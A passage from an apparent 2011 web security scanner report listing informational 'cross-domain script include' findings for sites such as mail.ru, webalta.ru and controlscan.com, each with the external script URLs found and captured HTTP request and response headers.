Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...

23.17. http://mail.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mail.ru
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://limg.imgsmail.ru/r/js/blogs/tooltiplib.js
http://limg.imgsmail.ru/r/js/splash.js?7
https://auth.mail.ru/https.js?1464913075

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<link href="http://limg.imgsmail.ru/mail/ru/css/go_search.css?16" rel="stylesheet" type=text/css>
<script language="javascript" src="http://limg.imgsmail.ru/r/js/splash.js?7" type="text/javascript" charset="windows-1251"></script>
...[SNIP]...
</script>

<script language="javascript" src="http://limg.imgsmail.ru/r/js/blogs/tooltiplib.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script language="javascript" src="http://limg.imgsmail.ru/r/js/blogs/tooltiplib.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://auth.mail.ru/https.js?1464913075" type="text/javascript" language="javascript"></script>
...[SNIP]...

23.18. http://nguard.com/about.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nguard.com
Path:	/about.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAp8z1VNE38srOQ1o5fXDRARSx6ctTO5fMIZE3YB6iT47nOM1iYBROmuKbl_gd95IJK_VjcpR2iBGfSw

Request

GET /about.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303735966.2.2.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303735966.2; __utmc=74935565; __utmb=74935565.1.10.1303735966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAp8z1VNE38srOQ1o5fXDRARSx6ctTO5fMIZE3YB6iT47nOM1iYBROmuKbl_gd95IJK_VjcpR2iBGfSw" type="text/javascript"></script>
...[SNIP]...

23.19. http://nguard.com/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nguard.com
Path:	/contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAp8z1VNE38srOQ1o5fXDRARSx6ctTO5fMIZE3YB6iT47nOM1iYBROmuKbl_gd95IJK_VjcpR2iBGfSw

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAp8z1VNE38srOQ1o5fXDRARSx6ctTO5fMIZE3YB6iT47nOM1iYBROmuKbl_gd95IJK_VjcpR2iBGfSw" type="text/javascript"></script>
...[SNIP]...

23.20. http://nguard.com/vulnerability-assessment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nguard.com
Path:	/vulnerability-assessment/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

Response

23.21. http://odnoklassniki.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://stg.odnoklassniki.ru/res/js/flashdetect.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="hook"><script src="http://stg.odnoklassniki.ru/res/js/flashdetect.js" type="text/javascript" onload="try{ document.getElementById('field_flashVer').value=GetSwfVer();} catch(e) {}"></script>
...[SNIP]...

23.22. http://pda.loveplanet.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pda.loveplanet.ru
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://css.loveplanet.ru/3/img/pda/main.js
http://css.loveplanet.ru/3/imgstc/xgemius/xgemius.js

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<link href="http://css.loveplanet.ru/3/img/pda/main.css" rel="stylesheet" type="text/css">
<script src='http://css.loveplanet.ru/3/img/pda/main.js' type='text/javascript'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/xgemius/xgemius.js"></script>
...[SNIP]...

23.23. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The response dynamically includes the following scripts from other domains:

http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js

Request

Response

23.24. http://pogoda.webalta.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pogoda.webalta.ru
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.webalta.ru/public/js/webalta.js
http://mc.yandex.ru/metrika/watch.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>............ ...
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/public/css/style-weather.css?v1">
<script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>
...[SNIP]...

23.25. http://pretty.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pretty.ru
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://css.loveplanet.ru/3/img/07_purple/main.js
http://css.loveplanet.ru/3/img/07_purple/v1/v1.js
http://css.loveplanet.ru/3/imgstc/fw_slideshow2.js
http://css.loveplanet.ru/3/imgstc/popup2d.js
http://css.loveplanet.ru/3/imgstc/swfobject.js
http://css.loveplanet.ru/3/imgstc/xgemius/xgemius.js
http://fotocash.ru/static/js/swfobject.js

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
<link href="http://css.loveplanet.ru/3/img/07_purple/v1/v1.css" rel="stylesheet" type="text/css">

<script src="http://css.loveplanet.ru/3/img/07_purple/main.js" type="text/javascript"></script>
<script src="http://css.loveplanet.ru/3/img/07_purple/v1/v1.js" type="text/javascript"></script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/fw_slideshow2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/popup2d.js"></script>
...[SNIP]...
<td class="bann_2"><script src="http://fotocash.ru/static/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/xgemius/xgemius.js"></script>
...[SNIP]...

23.26. http://shopping.netsuite.com/s.nl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The response dynamically includes the following scripts from other domains:

https://secure.eset.com/us/scripts/lib/s_code3.js
https://secure.eset.com/us/store/geoIpRedirect

Request

Response

23.27. http://solutions.kronos.com/forms/experience2011 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://solutions.kronos.com
Path:	/forms/experience2011

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js
http://img.en25.com/Web/KronosIncorporated/elqCPers.js
http://img.en25.com/Web/KronosIncorporated/elqCfg.js
http://img.en25.com/Web/KronosIncorporated/elqImg.js

Request

GET /forms/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.10.10.1303738437

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 14:59:53 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Last-Modfied: Mon, 25 Apr 2011 10:54:53 GMT
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:53 GMT
Content-Length: 52775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>

<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqImg.js"></script>

<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqCfg.js"></script>
...[SNIP]...

<script type="text/javascript" language="Javascript" src="http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqCPers.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqCPers.js"></script>
...[SNIP]...

23.28. https://store.manageengine.com/service-desk/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.manageengine.com
Path:	/service-desk/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://iplocation.zoho.com/
https://mestore.store.zoho.com/storeapi.na

Request

GET /service-desk/index.html HTTP/1.1
Host: store.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:05 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 11:59:05 GMT
ETag: "4d5be12-745c-4a16c77c85440"
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Tue, 24 Apr 2012 12:14:05 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29788

<html>
<head>

<title>ManageEngine ServiceDesk Plus tore</title>
<!-
...[SNIP]...
<link href="https://www.manageengine.com/products/service-desk/style/store-style.css" rel="stylesheet" type="text/css" />
<script src="https://mestore.store.zoho.com/storeapi.na" type="text/JavaScript"></script>
...[SNIP]...
</script>
<script language="javascript" src="https://iplocation.zoho.com"></script>
...[SNIP]...

23.29. http://tengrinews.kz/tag/891/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tengrinews.kz
Path:	/tag/891/

Issue detail

The response dynamically includes the following scripts from other domains:

http://counter.rambler.ru/top100.jcn?2378577
http://mc.yandex.ru/metrika/watch.js

Request

Response

23.30. http://webalta.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webalta.ru
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.webalta.ru/public/js/webalta.js
http://mc.yandex.ru/metrika/watch.js

Request

GET / HTTP/1.1
Host: webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:19:59 GMT
Server: Apache/1.3.42 (Unix)
Last-Modified: Mon, 25 Apr 2011 14:03:11 GMT
ETag: "34d88a0-75ce-4db57f1f"
Accept-Ranges: bytes
Content-Length: 30158
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>................
...[SNIP]...
<![endif]-->

   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...

<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...

23.31. http://webalta.ru/news.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webalta.ru
Path:	/news.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.webalta.ru/public/js/webalta.js
http://mc.yandex.ru/metrika/watch.js

Request

GET /news.html HTTP/1.1
Host: webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:06 GMT
Server: Apache/1.3.42 (Unix)
Last-Modified: Mon, 25 Apr 2011 14:18:12 GMT
ETag: "34d8a3b-6471-4db582a4"
Accept-Ranges: bytes
Content-Length: 25713
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>.. .............
...[SNIP]...
<![endif]-->

   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...

<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...

23.32. https://www.controlscan.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9
https://s.yimg.com/mi/eu/ywa.js
https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en
https://server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0

Request

GET / HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=180386997.730761609.1303732833.1303732833.1303732833.1; __utmc=180386997; fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

23.33. https://www.controlscan.com/checkout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/checkout.php

Issue detail

The response dynamically includes the following scripts from other domains:

https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9
https://s.yimg.com/mi/eu/ywa.js
https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en
https://server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0

Request

GET /checkout.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/shoppingcart.php?itemsadded=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

23.34. https://www.controlscan.com/checkout_invalid.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/checkout_invalid.php

Issue detail

The response dynamically includes the following scripts from other domains:

https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9
https://s.yimg.com/mi/eu/ywa.js
https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en
https://server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0

Request

Response

23.35. https://www.controlscan.com/pcicompliance.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/pcicompliance.php

Issue detail

